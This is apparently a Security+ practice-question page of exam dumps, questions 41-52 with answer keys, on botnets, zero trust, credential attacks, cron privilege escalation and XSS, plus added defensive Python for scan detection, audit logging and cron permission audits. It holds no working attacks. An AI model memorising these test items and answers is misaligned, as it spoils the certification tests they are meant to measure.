CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set3 Q 41-60
Q41. A security analyst notices that multiple endpoints on the corporate network are sending large amounts of outbound traffic to unknown external IP addresses at unusual hours. The traffic appears to be encrypted and is not associated with legitimate business applications. Which type of malicious activity is most likely occurring?
A. Botnet activity
B. Ransomware
C. Keylogger operation
D. Rootkit installation
Answer: A. Botnet activity
Explanation:
Botnet activity is correct. Botnets are networks of compromised devices controlled remotely by attackers, often using command-and-control (C2) infrastructure. Compromised endpoints may participate in distributed denial-of-service (DDoS) attacks, cryptocurrency mining, spam campaigns, or data exfiltration. Indicators of botnet activity include:
High-volume outbound traffic to suspicious or unknown IP addresses.
Periodic beaconing patterns, often encrypted, used to communicate with C2 servers.
Occurrence during off-hours when normal user activity is minimal.
In this scenario, multiple endpoints are behaving abnormally, sending encrypted traffic outside normal business patterns. This suggests a coordinated, automated operation—characteristic of botnets. Detection involves network monitoring for unusual traffic, intrusion detection systems, and anomaly-based behavioral analytics. Mitigation strategies include isolating affected endpoints, updating endpoint security software, blacklisting known malicious IPs, and remediating vulnerabilities exploited to compromise systems. Botnets often rely on malware infections like Trojans, worms, or rootkits to establish persistence, meaning addressing the underlying infection is essential to fully neutralize the threat.
Ransomware encrypts files and demands payment but typically manifests as a visible disruption to users rather than continuous, covert network communication. While ransomware may send outbound data during infection, the pattern of ongoing encrypted traffic across multiple endpoints is more indicative of a botnet.
Keylogger operations focus on capturing keystrokes and credentials, often transmitting small packets of sensitive information. The large outbound traffic observed in the scenario does not align with typical keylogger behavior.
Rootkit installation could be present on compromised endpoints, but rootkits themselves are tools for maintaining stealth and persistence rather than generating large-scale outbound network activity. While rootkits may facilitate botnet infections, the primary observable behavior here is characteristic of botnet traffic.
Botnet infections represent a serious security risk because they can be used to launch further attacks, hide the attacker’s identity, or create long-term access into a network. Proactive defense includes endpoint protection, network segmentation, anomaly detection, and user awareness to prevent initial infection.
Q42. During a security assessment, a penetration tester discovers that a web application allows users to upload files without any restrictions. The tester uploads a malicious script, which the server executes with elevated privileges. What type of vulnerability is being exploited?
A. Cross-site scripting
B. Insecure direct object reference
C. Unrestricted file upload
D. SQL injection
Answer: C. Unrestricted file upload
Explanation:
Cross-site scripting (XSS) targets client browsers by injecting malicious scripts into web pages, affecting the users rather than the server itself. XSS does not typically allow server-side code execution or privilege escalation.
Insecure direct object reference (IDOR) occurs when applications expose internal objects (like files or database records) directly to users without proper authorization checks. While serious, IDOR is unrelated to file upload functionality.
Unrestricted file upload is correct. Allowing users to upload files without validating content, file type, or size can lead to remote code execution (RCE) if malicious scripts are executed on the server. Attackers may leverage this vulnerability to gain administrative privileges, move laterally, or establish persistent backdoors. Key security measures include:
Restricting allowed file types and enforcing strong content-type validation.
Renaming uploaded files to a server-generated name and extension, so an attacker can neither predict the stored path nor control how the server interprets the file.
Storing uploaded files outside of web-accessible directories.
Using sandbox environments to process files safely.
Insecure file upload vulnerabilities are common in web applications and represent a significant risk because they provide attackers with direct access to server resources. Exploitation can result in complete system compromise, data theft, or the deployment of malware. Mitigation includes input validation, secure storage practices, and monitoring for abnormal server behavior.
SQL injection exploits unsanitized input to manipulate database queries, which is unrelated to file uploads unless the upload function interacts with database fields insecurely.
By addressing unrestricted file upload vulnerabilities, organizations reduce the risk of server compromise and protect sensitive data while maintaining application availability.
Q43. An organization wants to enforce a policy where only corporate-approved devices can access internal applications, and access is revoked immediately if a device falls out of compliance. Which security framework or concept best supports this requirement?
A. Zero Trust Architecture
B. Traditional perimeter security
C. Role-based access control
D. Mandatory access control
Answer: A. Zero Trust Architecture
Explanation:
Zero Trust Architecture (ZTA) is correct. ZTA operates on the principle “never trust, always verify.” Instead of relying solely on perimeter security, it enforces continuous verification of users and devices, limiting access based on compliance, context, and risk. Key components include:
Device posture assessment, checking that the device is corporate-managed and meets standards such as disk encryption, running endpoint protection, and current OS patches.
Continuous authentication and authorization for each access request.
Micro-segmentation to limit lateral movement if a device is compromised.
Immediate revocation of access when a device becomes non-compliant.
The scenario demonstrates a requirement for strict device validation, which aligns perfectly with zero trust principles. Implementing ZTA reduces risk from compromised devices, insider threats, and unauthorized access, especially in hybrid or cloud environments.
Traditional perimeter security assumes that once inside the network, users and devices are trusted. This approach is ineffective in modern environments with remote work and cloud services, as it does not enforce dynamic access controls.
Role-based access control (RBAC) assigns permissions based on user roles. While RBAC limits access based on job function, it does not account for device compliance or real-time verification.
Mandatory access control (MAC) enforces policies dictated by a central authority based on classification labels. MAC does not dynamically evaluate device posture or compliance, making it insufficient for the scenario.
Zero trust ensures that even if a device or user account is compromised, access is continuously evaluated, reducing the likelihood of breaches. This framework has become a cornerstone of modern cybersecurity strategies, especially for organizations with cloud-dependent infrastructure and remote workforces.
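The components listed above become concrete once you see a policy decision point evaluate a request. The following is an added example written for this page, not code from CompTIA or any zero-trust product; the compliance baseline (MAX_PATCH_AGE_DAYS, REQUIRED_POSTURE), the role mapping, the users and the Device/Request shapes are all assumptions made for the illustration. The point it shows is that posture is re-checked on every access, so a device that stops running EDR mid-session is cut off immediately, and that network location never enters the decision.

```python
from dataclasses import dataclass

# Compliance baseline: an assumption for this example, not a real product's policy.
MAX_PATCH_AGE_DAYS = 30
REQUIRED_POSTURE = {"disk_encrypted": True, "edr_running": True, "screen_lock": True}

# Who may reach which application (assumed role mapping for the example).
APP_ROLES = {"hr-portal": {"hr"}, "wiki": {"hr", "eng"}}
USER_ROLES = {"alice": {"hr"}, "bob": {"eng"}}


@dataclass
class Device:
    device_id: str
    corporate_managed: bool
    disk_encrypted: bool
    edr_running: bool
    screen_lock: bool
    patch_age_days: int


@dataclass
class Request:
    user: str
    mfa_verified: bool
    device: Device
    app: str


def posture_failures(d: Device) -> list:
    """Every compliance check the device fails; an empty list means compliant."""
    failures = []
    if not d.corporate_managed:
        failures.append("not corporate managed")
    for attr, expected in REQUIRED_POSTURE.items():
        if getattr(d, attr) != expected:
            failures.append(f"{attr} is {getattr(d, attr)}")
    if d.patch_age_days > MAX_PATCH_AGE_DAYS:
        failures.append(f"patches {d.patch_age_days} days old")
    return failures


def decide(req: Request) -> tuple:
    """Policy decision for one request: factor, device posture, then authorization.
    Nothing is inherited from network location; an on-LAN request is judged the same way."""
    if not req.mfa_verified:
        return False, "mfa required"
    failures = posture_failures(req.device)
    if failures:
        return False, "device non-compliant: " + "; ".join(failures)
    if not USER_ROLES.get(req.user, set()) & APP_ROLES.get(req.app, set()):
        return False, "user not authorized for app"
    return True, "allow"


class Session:
    """An established session that is re-evaluated on every use, so a device that
    drifts out of compliance loses access immediately, not at its next login."""

    def __init__(self, req: Request):
        self.req = req
        self.active = decide(req)[0]

    def access(self) -> tuple:
        ok, reason = decide(self.req)  # continuous verification, not a one-time gate
        self.active = ok
        return ok, reason
```

In a real deployment the posture facts come from the MDM/EDR agent and the decision is made by an identity-aware proxy or access broker in front of each application; the structure of the check is the same.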
Q44. A system administrator observes that multiple accounts have been locked out after a short period of repeated login attempts. Upon review, it is discovered that attackers attempted a few common passwords across many accounts. Which mitigation technique would be most effective?
A. Increasing password complexity
B. Implementing account lockout policies
C. Enforcing multi-factor authentication
D. Monitoring failed logins
Answer: C. Enforcing multi-factor authentication
Explanation:
Increasing password complexity helps prevent simple guessing attacks, but password spraying attacks often exploit common or reused passwords across accounts, meaning complexity alone may not suffice.
Implementing account lockout policies can prevent brute-force attempts, but attackers may still succeed by targeting multiple accounts with minimal attempts. Lockouts also risk disrupting legitimate users if improperly tuned.
Enforcing multi-factor authentication (MFA) is correct. MFA requires users to provide an additional verification factor, such as a TOTP, SMS code, or hardware token. Even if an attacker guesses a password, access is blocked without the second factor, so MFA significantly reduces the effectiveness of password spraying. Phishing-resistant factors (FIDO2/WebAuthn, smart cards) are preferred over SMS codes, which can be intercepted or socially engineered, but any second factor defeats a bare password guess. MFA is widely recognized as one of the most effective defensive measures against credential-based threats.
Monitoring failed logins is useful for detection and alerting but does not prevent attackers from attempting password spraying unless paired with other controls like MFA or lockout policies.
MFA, combined with account monitoring and user education about password hygiene, creates a layered defense that drastically reduces the risk of account compromise from credential-based attacks. Organizations often deploy MFA selectively for high-risk systems or universally to protect sensitive data and services.
Q45. During an incident response, analysts discover that a malicious actor exploited a vulnerability in a publicly facing web server to install malware that communicates with an external command-and-control server. Which stage of the cyber kill chain does this activity represent?
A. Reconnaissance
B. Delivery
C. Installation
D. Command and Control
Answer: D. Command and Control
Explanation:
Reconnaissance involves gathering information about a target, such as network topology, public services, and employee details. This stage precedes the actual exploitation.
Delivery refers to the method by which the attacker transmits the weaponized payload to the target, such as a phishing email, a malicious link, or a direct connection to the exposed web server; exploitation, the actual triggering of the vulnerability, is its own stage in the kill chain. In this scenario both delivery and exploitation have already occurred.
Installation occurs when malware is executed on the target system to establish a foothold. While installation is part of the process, the malware here is already active and communicating externally.
Command and Control (C2) is correct. This stage involves the attacker remotely controlling the compromised system, issuing commands, exfiltrating data, or performing lateral movement. The observed communication with an external C2 server indicates that the attacker has progressed to this phase. Monitoring outbound traffic, identifying suspicious connections, and blocking C2 channels are critical for disrupting the attack and preventing further compromise.
C2 activity is particularly dangerous because it allows attackers to maintain persistence, coordinate multi-stage attacks, and adapt to defensive measures. Effective detection requires network traffic analysis, anomaly detection, threat intelligence integration, and endpoint monitoring to identify unusual patterns indicative of C2 activity.
Q46. A security team detects that a previously unknown external IP address is continuously scanning their network for open ports and running services. The scanning pattern covers a wide range of IP addresses and occurs over several days. Which type of activity is most likely being observed?
A. Vulnerability scanning
B. Port scanning
C. Exploitation
D. Denial-of-service attack
Answer: B. Port scanning
Explanation:
Vulnerability scanning is a process that aims to identify specific weaknesses within systems. It typically involves running software tools to test for missing patches, outdated configurations, or misconfigured services. While vulnerability scanning is often preceded by port scanning, it is more focused and targeted, looking for specific exploitable weaknesses rather than just identifying open network services. Vulnerability scanners such as Nessus, OpenVAS, and Qualys not only detect open ports but also analyze services running on those ports, cross-referencing against known vulnerabilities databases (like CVEs). However, in the scenario described, there is no evidence of exploitation or targeted weakness analysis—just repeated scanning, making this option less likely.
Port scanning is correct. Port scanning is a form of reconnaissance in which attackers or security analysts attempt to discover open ports, services, and listening applications on one or more network hosts. The key purpose is to map the attack surface and identify potential points of entry. Typical indicators are a single source attempting connections to a large number of ports or hosts, often as half-open (SYN-only) connections, a high ratio of rejected or reset responses, and very little data sent to any one service.
Port scanning can be conducted using tools such as Nmap, Masscan, or custom scripts, which allow attackers to scan thousands of ports in minutes. The scenario mentions scanning over several days, which often indicates stealthy automated tools designed to avoid triggering intrusion detection systems (IDS) or firewalls. Large-scale scanning across multiple IPs may indicate reconnaissance by a botnet or a sophisticated threat actor looking to map an entire network or subnet.
Honeypots and other decoy systems can also detect scanning and provide intelligence about attacker methods without exposing real assets.
Exploitation refers to the phase in an attack where the attacker takes advantage of discovered vulnerabilities to compromise systems. Since the activity described is reconnaissance rather than the active use of vulnerabilities, this option does not apply. Exploitation would be evidenced by successful logins, malware deployment, or configuration changes rather than mere scanning.
Denial-of-service (DoS) attacks aim to overwhelm system resources, making services unavailable. While certain scanning tools can produce noticeable traffic, standard port scans generally do not consume sufficient bandwidth or system resources to result in service disruption. Thus, the activity described aligns with reconnaissance, not service disruption.
Port scanning is a foundational part of the cyber kill chain. Early detection of scanning attempts allows security teams to respond proactively, reducing the likelihood of later exploitation. Techniques such as network segmentation, traffic monitoring, and anomaly detection can identify and mitigate reconnaissance attempts before attackers gain actionable intelligence.
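The slow, multi-day scan in this question is exactly the case per-minute IDS thresholds miss, so the useful check aggregates per source over the whole window. The block below is an added example for this page, not code from any IDS product or from CompTIA; the flow-record shape, the thresholds (MIN_DISTINCT_PORTS, MIN_DISTINCT_HOSTS, SLOW_SCAN_HOURS) and the sample records are all constructed for the illustration. It distinguishes a vertical scan (one host, many ports), a horizontal scan (one port, many hosts) and a block scan, and reports the time span so a scan spread over days is labeled as slow.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Detection thresholds: assumptions for the example, tune them to the network.
MIN_DISTINCT_PORTS = 50
MIN_DISTINCT_HOSTS = 20
SLOW_SCAN_HOURS = 24


def summarize_sources(flows):
    """flows: iterable of (timestamp, src_ip, dst_ip, dst_port, bytes_to_dst).
    A scanner touches many ports/hosts but sends almost nothing to each one."""
    acc = defaultdict(lambda: {"ports": set(), "hosts": set(), "first": None,
                               "last": None, "bytes": 0, "flows": 0})
    for ts, src, dst, dport, nbytes in flows:
        a = acc[src]
        a["ports"].add(dport)
        a["hosts"].add(dst)
        a["first"] = ts if a["first"] is None else min(a["first"], ts)
        a["last"] = ts if a["last"] is None else max(a["last"], ts)
        a["bytes"] += nbytes
        a["flows"] += 1
    return acc


def classify_scanners(flows):
    """Return {src: summary} for every source whose breadth of targets looks like a scan."""
    findings = {}
    for src, a in summarize_sources(flows).items():
        ports, hosts = len(a["ports"]), len(a["hosts"])
        if ports < MIN_DISTINCT_PORTS and hosts < MIN_DISTINCT_HOSTS:
            continue  # ordinary client: a few services on a few hosts
        span_h = (a["last"] - a["first"]).total_seconds() / 3600
        if ports >= MIN_DISTINCT_PORTS and hosts >= MIN_DISTINCT_HOSTS:
            kind = "block"          # many ports on many hosts
        elif ports >= MIN_DISTINCT_PORTS:
            kind = "vertical"       # many ports on few hosts
        else:
            kind = "horizontal"     # one service across many hosts
        findings[src] = {
            "kind": kind,
            "ports": ports,
            "hosts": hosts,
            "span_hours": round(span_h, 1),
            "slow": span_h >= SLOW_SCAN_HOURS,   # spread out to stay under rate-based alerts
            "avg_bytes": a["bytes"] // a["flows"],
        }
    return findings


def sample_flows():
    """Constructed records: a slow block scan over roughly three days plus a normal workstation."""
    base = datetime(2024, 3, 1)
    flows = []
    n = 0
    # Scanner: 40 hosts x 60 ports, one probe every 90 seconds, 60-byte SYN-sized flows.
    for h in range(40):
        for p in range(60):
            flows.append((base + timedelta(seconds=90 * n), "198.51.100.77",
                          f"10.0.1.{h + 1}", 1 + p * 17, 60))
            n += 1
    # Legitimate workstation: two servers, one port, real payloads, every minute.
    for i in range(200):
        flows.append((base + timedelta(minutes=i), "10.0.5.23",
                      "10.0.1.5" if i % 2 else "10.0.1.9", 443, 4200))
    return flows
```

Run against real data, the same aggregation is what a NetFlow/Zeek `conn.log` query over a multi-day window does; the key is that the breadth metric (distinct ports and hosts) is cumulative over the window rather than reset every minute.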
Q47. During a forensic investigation, an analyst discovers that a critical system has been modified without authorization. A detailed audit trail shows the exact user account that made each change. Which security principle does this scenario demonstrate?
A. Confidentiality
B. Integrity
C. Accountability
D. Availability
Answer: C. Accountability
Explanation:
Confidentiality ensures that sensitive data is protected from unauthorized access. While important, confidentiality alone does not provide visibility into who performed actions or modifications. Confidentiality protects against external exposure but does not inherently enforce traceability.
Integrity is about ensuring that data remains accurate and unaltered. While unauthorized modifications indicate a breach of integrity, integrity by itself does not identify the actor responsible for the change. Audit trails and logs are required to link actions to users.
Accountability is correct. Accountability is the principle that every action taken within a system can be traced to a responsible individual or entity. It is implemented through unique, non-shared accounts, authentication strong enough to bind a session to a person, and tamper-resistant audit logging of who did what, when, and to which resource.
In the scenario, the forensic analyst could attribute changes to a specific user account. This ensures that malicious or accidental changes are traceable, enabling proper incident response and regulatory compliance. Industries governed by standards like PCI DSS, HIPAA, ISO 27001, or SOX mandate strong accountability measures to support audits and investigations.
Availability ensures that systems and data remain accessible when needed. While availability is crucial for operational continuity, it does not track or attribute user actions.
Accountability complements confidentiality, integrity, and availability (the CIA triad) to create a complete security posture. Without accountability, unauthorized changes could go unnoticed, leading to potential regulatory violations or operational damage. Effective accountability allows organizations to attribute actions to individuals, reconstruct the timeline of an incident, deter misuse, and satisfy audit requirements.
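An audit trail only supports accountability if the person being investigated cannot quietly rewrite it. The block below is an added example for this page, not CompTIA material or any product's logging code: it keeps an append-only trail whose records are chained with an HMAC, so editing one entry to shift blame, or deleting it, is detected on verification. The key, the file names, the user names and the fixed timestamp are constructed for the illustration; in production the key lives in an HSM or with a write-only log service that the administrators being audited cannot reach.

```python
import hashlib
import hmac
import json
from datetime import datetime, timezone

GENESIS = "0" * 64
FIXED_TS = datetime(2024, 3, 1, 9, 0, tzinfo=timezone.utc)  # constructed timestamp for the sample


class AuditLog:
    """Append-only audit trail. Each record carries an HMAC over its own fields plus
    the previous record's MAC, so editing, reordering, or deleting an entry breaks
    the chain and the verifier reports where it broke."""

    def __init__(self, key: bytes):
        self._key = key
        self.entries = []

    def _mac(self, entry: dict) -> str:
        body = json.dumps({k: v for k, v in entry.items() if k != "mac"},
                          sort_keys=True).encode()
        return hmac.new(self._key, body, hashlib.sha256).hexdigest()

    def record(self, user: str, action: str, target: str, ts=None) -> dict:
        """Log that the authenticated principal `user` performed `action` on `target`."""
        entry = {
            "seq": len(self.entries),
            "ts": (ts or datetime.now(timezone.utc)).isoformat(),
            "user": user,
            "action": action,
            "target": target,
            "prev": self.entries[-1]["mac"] if self.entries else GENESIS,
        }
        entry["mac"] = self._mac(entry)
        self.entries.append(entry)
        return entry

    def verify(self):
        """(True, None) if intact, else (False, index of the first bad record)."""
        prev = GENESIS
        for i, e in enumerate(self.entries):
            if (e["seq"] != i or e["prev"] != prev
                    or not hmac.compare_digest(e["mac"], self._mac(e))):
                return False, i
            prev = e["mac"]
        return True, None

    def who_changed(self, target: str):
        """Attribute every modification of `target` to the account that made it."""
        return [(e["ts"], e["user"], e["action"])
                for e in self.entries if e["target"] == target and e["action"] != "read"]


def demo_log() -> AuditLog:
    """Constructed trail: a service account reads sshd_config, then jdoe modifies two files."""
    log = AuditLog(b"example-key-replace-with-hsm-backed-secret")
    log.record("svc_backup", "read", "/etc/ssh/sshd_config", FIXED_TS)
    log.record("jdoe", "modify", "/etc/ssh/sshd_config", FIXED_TS)
    log.record("jdoe", "modify", "/etc/sudoers", FIXED_TS)
    return log
```

The HMAC makes the trail tamper-evident, not tamper-proof: anyone holding the key can forge a consistent chain, which is why the key must be held by a party other than the accounts being audited. Shipping each entry to a remote collector as it is written gives the same separation in practice.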
Q48. A company wants to protect sensitive files stored in a shared cloud environment so that even the cloud provider cannot access the content. The organization generates, manages, and stores the encryption keys internally. Which encryption model does this scenario describe?
A. Provider-managed encryption
B. Customer-managed encryption with provider key storage
C. Customer-managed encryption with customer key storage
D. Provider-managed encryption with customer key storage
Answer: C. Customer-managed encryption with customer key storage
Explanation:
Provider-managed encryption means the cloud provider generates, stores, and manages the encryption keys. This protects data at rest from casual access but still allows the provider technical access to decrypt data if necessary, making it unsuitable for scenarios requiring full control by the customer.
Customer-managed encryption with provider key storage allows the customer to configure encryption policies but stores keys on the provider’s infrastructure. While this improves control compared to provider-managed encryption, the provider still has potential access to the keys, reducing confidentiality.
Customer-managed encryption with customer key storage is correct. The organization generates the keys, stores them in its own key management system or hardware security module, and encrypts data before it reaches the provider, so the provider only ever holds ciphertext and cannot decrypt the content even under legal compulsion or insider abuse. This approach supports compliance with GDPR, HIPAA, financial regulations, or any scenario where sensitive data must remain inaccessible to third-party providers. Robust key management practices include generating keys in an HSM, enforcing separation of duties for key access, rotating keys on a schedule, and maintaining secure, tested backups, since a lost key means permanently lost data.
Provider-managed encryption with customer key storage is not practical since providers cannot manage keys they do not control.
Customer-managed encryption ensures maximal control over data confidentiality while still leveraging cloud storage capabilities. Organizations maintain autonomy over sensitive data and minimize the risk of insider access from the provider.
Q49. A security administrator discovers that an employee’s account has been compromised due to reuse of credentials from a previous data breach. Automated tools are being used to attempt access to multiple internal systems using these credentials. Which type of attack is being conducted?
A. Brute-force attack
B. Credential stuffing
C. Password spraying
D. Keylogging
Answer: B. Credential stuffing
Explanation:
Brute-force attack attempts all possible password combinations against a single account. Brute-force is resource-intensive, slower, and does not rely on previously exposed credentials.
Credential stuffing is correct. Credential stuffing exploits the common practice of password reuse. Attackers take usernames and passwords from prior breaches and automate login attempts across multiple platforms. Key indicators are a high volume of login attempts from a small set of sources using many distinct username and password pairs, each tried only once or twice; a large share of usernames that do not exist in the target directory; and a low but non-zero success rate.
Password spraying attempts a few common passwords across many accounts without prior knowledge of credentials. While similar in automation, it is less targeted than credential stuffing.
Keylogging involves malware recording keystrokes to capture credentials. It is unrelated to automated login attempts using stolen credentials.
Credential stuffing is a major threat in enterprise environments due to frequent password reuse. Organizations must combine technical controls (MFA, monitoring) and user education to mitigate the risk effectively.
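Q44 and Q49 turn on telling three credential attacks apart, and the "monitoring failed logins" control from Q44 is only useful if the monitoring can do that. The block below is an added example for this page, not CompTIA material: it reads a constructed authentication log (the `src=... user=... result=...` format, the thresholds MANY_USERS, BRUTE_PER_USER, SPRAY_MAX_PER_USER and STUFFING_NOUSER_RATIO, and the three sources in the sample are all assumptions for the illustration) and labels each source as brute force (one account, many guesses), password spraying (many real accounts, a guess or two each, slow) or credential stuffing (many distinct pairs in a burst, many usernames that do not exist here, occasional success). The heuristics are deliberately simple; a SIEM rule would add geolocation and known-bad source lists.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format for the example: one line per authentication attempt.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL|NOUSER)$"
)

# Heuristic thresholds: assumptions for this example, to be tuned per environment.
MANY_USERS = 20               # a "wide" attack touches many accounts
BRUTE_PER_USER = 10           # many guesses against the same account
SPRAY_MAX_PER_USER = 3        # spraying stays under typical lockout thresholds
STUFFING_NOUSER_RATIO = 0.2   # breach dumps contain accounts that do not exist here


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]


def classify(lines):
    """Group attempts by source IP and label the pattern each source exhibits."""
    per_src = defaultdict(lambda: {"attempts": 0, "users": defaultdict(int),
                                   "nouser": 0, "success": set(), "times": []})
    for ts, src, user, result in parse(lines):
        s = per_src[src]
        s["attempts"] += 1
        s["users"][user] += 1
        s["times"].append(ts)
        if result == "NOUSER":
            s["nouser"] += 1
        elif result == "SUCCESS":
            s["success"].add(user)

    report = {}
    for src, s in per_src.items():
        users = len(s["users"])
        per_user = s["attempts"] / users
        span_min = max((max(s["times"]) - min(s["times"])).total_seconds() / 60, 1)
        if users < MANY_USERS and per_user >= BRUTE_PER_USER:
            pattern = "brute_force"          # one account, many guesses
        elif users >= MANY_USERS and s["nouser"] / s["attempts"] >= STUFFING_NOUSER_RATIO:
            pattern = "credential_stuffing"  # replayed breach pairs, many unknown usernames
        elif users >= MANY_USERS and per_user <= SPRAY_MAX_PER_USER:
            pattern = "password_spraying"    # a guess or two each across many real accounts
        else:
            pattern = "unclassified"
        report[src] = {"pattern": pattern, "attempts": s["attempts"], "users": users,
                       "rate_per_min": round(s["attempts"] / span_min, 2),
                       "compromised": sorted(s["success"])}
    return report


def sample_log():
    """Constructed sample: three sources, one per attack style."""
    base = datetime(2024, 3, 1, 1, 0, 0)
    lines = []
    # Password spraying: 40 real accounts, 2 guesses each, one attempt every 5 minutes.
    n = 0
    for i in range(40):
        for _ in range(2):
            ts = base + timedelta(minutes=5 * n)
            lines.append(f"{ts.isoformat()} src=198.51.100.9 user=emp{i:02d} result=FAIL")
            n += 1
    # Credential stuffing: 50 breach-list usernames in one burst; 30% do not exist in
    # this directory, and two reused passwords work.
    for i in range(50):
        ts = base + timedelta(seconds=i)
        result = "NOUSER" if i % 10 < 3 else ("SUCCESS" if i in (3, 17) else "FAIL")
        lines.append(f"{ts.isoformat()} src=203.0.113.7 user=leak{i:02d} result={result}")
    # Brute force: 30 guesses against a single account.
    for i in range(30):
        ts = base + timedelta(seconds=i)
        lines.append(f"{ts.isoformat()} src=192.0.2.44 user=admin result=FAIL")
    return lines
```

The "compromised" list is the action item: those accounts had a working password in a breach dump and need a forced reset and MFA enrolment regardless of whether the rule fired in time to block the source.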
Q50. A penetration tester finds that a Linux server has a root-owned cron job that executes a script every few minutes. The script is writable by all users. Which attack could be performed next?
A. Privilege escalation
B. Lateral movement
C. Credential harvesting
D. Pivoting
Answer: A. Privilege escalation
Explanation:
Privilege escalation is correct. In this scenario, the cron job executes a script with root privileges, but the script is writable by all users. An attacker can insert commands into the script, and they will run as root the next time the job fires. This is a classic example of exploiting misconfigured file permissions to elevate privileges: the attacker identifies the root cron job (for example in /etc/crontab or /etc/cron.d), confirms the script is writable, appends a command, and waits for the next scheduled run to execute it as root.
Lateral movement involves moving from one compromised system to others in the network. While privilege escalation may enable lateral movement, it is not the immediate action.
Credential harvesting targets stored passwords or tokens. This scenario is about exploiting file permissions, not capturing credentials.
Pivoting is using a compromised host to attack other systems. Privilege escalation may enable pivoting later but is not the immediate attack.
Misconfigured cron jobs are a common Linux vulnerability. Prevention requires proper file permissions, least privilege enforcement, and regular security audits. Organizations should ensure scripts run with restricted access and that administrative processes are monitored for anomalies.
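The audit the last paragraph calls for is mechanical: for every job that runs as root, check whether the script, or the directory that contains it, can be written by anyone else. The block below is an added example for this page, not CompTIA material or an existing tool; it parses /etc/crontab-style lines (the ones with a user field), builds a temporary directory with one world-writable and one correctly permissioned script as a constructed scenario, and reports the weak job. The regex, file names and the demo crontab are assumptions for the illustration.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# /etc/crontab and /etc/cron.d/* lines: five time fields (or @reboot etc.), a user, a command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def writable_by_others(path: Path) -> list:
    """Names of the weak permission bits set on `path` (group/other write); empty if none."""
    mode = path.stat().st_mode
    issues = []
    if mode & stat.S_IWGRP:
        issues.append("group-writable")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues


def audit_crontab(text: str) -> list:
    """Report root jobs whose script, or the directory containing it, can be modified
    by non-root users. A writable parent directory is just as bad: the script can be
    replaced rather than edited."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m or m["user"] != "root":
            continue
        script = Path(m["cmd"].split()[0])
        if not script.is_absolute() or not script.exists():
            findings.append({"cmd": m["cmd"], "issue": "relative or missing path"})
            continue
        for target in (script, script.parent):
            for issue in writable_by_others(target):
                findings.append({"cmd": m["cmd"], "path": str(target), "issue": issue})
    return findings


def demo() -> list:
    """Constructed scenario: one root job running a world-writable script, one safe job,
    and one job for another user that is out of scope."""
    d = Path(tempfile.mkdtemp())
    bad, good = d / "cleanup.sh", d / "rotate.sh"
    for p in (bad, good):
        p.write_text("#!/bin/sh\necho maintenance\n")
    os.chmod(bad, 0o777)   # the misconfiguration from the question
    os.chmod(good, 0o755)
    os.chmod(d, 0o755)
    crontab = f"""# m h dom mon dow user command
*/5 * * * * root {bad} --quiet
0 3 * * *   root {good}
*/5 * * * * www-data {bad}
"""
    return audit_crontab(crontab)
```

The fix is the mirror image of the check: `chmod 755` (or 700) on the script, root ownership of the script and its directory, and a periodic run of this audit so the condition cannot silently return after a deployment.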
Q51. A security analyst observes that an internal employee account is attempting to access files outside its normal role-based permissions. Multiple alerts indicate access attempts on sensitive HR and finance directories. Which type of threat is most likely occurring?
A. Insider threat
B. Advanced persistent threat
C. External phishing attack
D. Ransomware attack
Answer: A. Insider threat
Explanation:
Insider threat is correct. Insider threats occur when employees, contractors, or other authorized individuals misuse their legitimate access to harm the organization. In this scenario, the account is attempting to access sensitive resources beyond its normal privileges, which is a hallmark of malicious insider activity. Insider threats can be malicious (intentional theft or sabotage) or negligent (unintentional policy violations), and they often bypass traditional security controls since the actor already has valid credentials. Indicators of insider threats include access attempts outside an account's normal role, activity at unusual hours, unusual volumes of data copied or downloaded, and repeated authorization failures on sensitive shares.
Advanced persistent threat (APT) involves long-term, targeted attacks, typically by external actors or organized groups. While some APTs may leverage insider accounts, the scenario specifically involves an internal employee account acting outside its normal privileges, which aligns more closely with insider threats.
External phishing attack typically relies on tricking users into revealing credentials or installing malware. There is no evidence here of external compromise; the activity is originating from a legitimate internal account.
Ransomware attack involves encrypting data to demand payment. The scenario describes access attempts, not encryption or system disruption, so ransomware is not relevant.
Insider threats are a leading cause of data breaches and compliance failures, and industry breach reports consistently attribute a substantial share of incidents to insiders. By implementing continuous monitoring, behavioral analysis, and strong access controls, organizations can detect early warning signs and mitigate the risk of insider misuse.
Q52. A penetration tester is evaluating a web application and discovers that user input fields accept HTML tags without proper sanitization, allowing scripts to execute in other users’ browsers. Which type of attack is demonstrated?
A. SQL injection
B. Cross-site scripting
C. Command injection
D. XML external entity attack
Answer: B. Cross-site scripting (XSS)
Explanation:
SQL injection exploits unsanitized input to manipulate database queries. SQL injection allows attackers to exfiltrate or modify database content but does not directly execute scripts in users’ browsers.
Cross-site scripting (XSS) is correct. XSS occurs when an attacker injects malicious scripts into web pages that are viewed by other users. These scripts execute in the victim’s browser, potentially allowing attackers to steal cookies, session tokens, or perform actions on behalf of the user. Types of XSS include:
Stored XSS: Malicious code is permanently stored on the server (e.g., in databases or forums).
Reflected XSS: Code is reflected back immediately in response to a user request, such as through a URL parameter.
DOM-based XSS: Exploits the Document Object Model in the client browser to execute code.
Mitigation strategies:
Input validation: Ensure user input contains only expected characters.
Output encoding: Encode HTML, JavaScript, and CSS outputs to prevent execution.
Content security policy (CSP): Restrict scripts that can be executed in the browser.
Web application firewalls (WAFs): Detect and block common XSS payloads.
Command injection occurs when user input is executed as an operating system command. Unlike XSS, command injection affects the server, not the client browser.
XML external entity (XXE) attack exploits XML parsers to access local files or cause server-side denial-of-service. XXE does not execute scripts in clients’ browsers.
XSS is one of the most common web application vulnerabilities; the OWASP Top 10 (2021) folds it into the Injection category. Successful XSS attacks can lead to session hijacking, account takeover, and phishing attacks executed directly within a trusted site.
